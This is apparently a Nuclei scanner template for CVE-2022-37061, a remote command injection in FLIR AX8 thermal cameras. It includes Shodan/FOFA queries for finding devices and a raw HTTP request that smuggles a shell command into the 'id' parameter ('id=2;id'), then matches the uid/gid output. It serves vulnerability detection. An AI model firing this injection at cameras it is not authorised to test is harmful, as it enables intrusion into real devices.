id: CVE-2022-37061 info: name: FLIR AX8 1.46.16 - Remote Command Injection author: ritikchaddha severity: critical description: | FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands. impact: | Authenticated attackers can execute arbitrary OS commands on FLIR AX8 thermal imaging cameras through command injection in the alarm functionality's id parameter, potentially gaining complete control over the camera system and connected infrastructure. remediation: | Upgrade to the latest version of FLIR AX8 that addresses this vulnerability. Implement proper input validation and sanitization for all user-supplied data. reference: - https://www.exploit-db.com/exploits/52240 - https://www.flir.com/products/ax8-automation/ - https://nvd.nist.gov/vuln/detail/CVE-2022-37061 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-37061 cwe-id: CWE-78 epss-score: 0.93519 epss-percentile: 0.99835 metadata: verified: true max-request: 1 vendor: flir product: ax8 shodan-query: title:"FLIR" fofa-query: app="FLIR-AX8" tags: cve,cve2022,flir,ax8,rce,authenticated,vkev,vuln http: - raw: - | POST /login/dologin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_name={{username}}&user_password={{password}} - | POST /res.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=alarm&id=2;id matchers-condition: and matchers: - type: regex part: body_2 regex: - 'uid=([0-9(a-z)]+)' - 'gid=([0-9(a-z)]+)' - 'visualBeep' condition: and - type: status status: - 200 # digest: 4b0a00483046022100edaff414faf5330feac3bbe024702c7a415675c4dd8e3efb1ca4e13acb550c190221008781fc7366fda399e88704e4868317458b59640ab18e905621eb53ed587fe839:922c64590222798bb761d5b6d8e72950